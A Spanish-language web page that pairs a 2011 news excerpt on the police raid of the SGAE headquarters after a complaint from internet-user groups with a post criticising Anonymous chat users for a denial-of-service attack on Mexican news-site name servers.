La sede de la SGAE permanece cerrada a cal y canto desde el inicio del registro y todos los trabajadores de la sociedad han sido desalojados.

Denuncia de los internautas

El origen de la operación está en un escrito de la Fiscalía Anticorrupción que fue presentado hace unas semanas ante el Decanato de la Audiencia Nacional a a raíz de una denuncia interpuesta en noviembre de 2007 po la Asociación de Internautas, la Asociación de Usuarios de Internet, la Asociación Española de Pequeñas y Medianas Empresas de Informática y Nuevas Tecnologías (APEMIT) y la Asociación Española de Hosteleros Víctimas del Canon (VACHE).

La denuncia se basaba en la aparición en distintos medios de comunicación de varias "supuestas ilicitudes cometidas en la gestión económica de los recursos de la SGAE".

Los internautas denunciaban que los directivos de la SGAE habían creado una trama societaria de empresas filiales en torno a la Sociedad Digital de Autores y Editores (SDAE) en las que las cantidades recaudadas en concepto de gestión de derechos de autor se invertían en actividades lucrativas para las mismas.

Más noticias:

//www.abc.es/20110701/cultura/abci-registran-sgae-201107011002.html



Es la primera vez que veo en Anonymous atacar a un medio de comunicación. Sinceramente, nunca llegué a pensar que se llegaría a este extremo.

Primero empezaron atacando a la página web de iniciativamexico.org. Como no podían tumbarla, decidieron que lo mejor sería atacar a las NS (name servers) del dominio de iniciativamexico.org ( sdn02.esmas.com y sdn01.esmas.com ) durante más de 2 horas, afectando así al portal de noticias de esmás.com y a otros medios que utilizan esas NS. 


 Había unos 9 operadores allí presentes en el canal, y ninguno dijo nada al respecto, es más, algunos animaban al resto de usuarios a apuntar con sus cañones a ese objetivo.

En cuanto a los usuarios del canal, no vi a nadie decir que no atacarán a ese target, hasta que entró Itzela y cambió el topic. Después todos aquellos que atacaban y animaban al resto de personas a sumarse  al ataque - operadores incluidos -, como si de otras personas se tratase, empezaron a decir que “NO SE ATACA A LOS MEDIOS DE COMUNICACIÓN”.

Esto demuestra que muchos usuarios o la gran mayoría de ellos de #iberoamerica, únicamente están allí para atacar a cualquier página y que les da igual el objetivo que sea.
top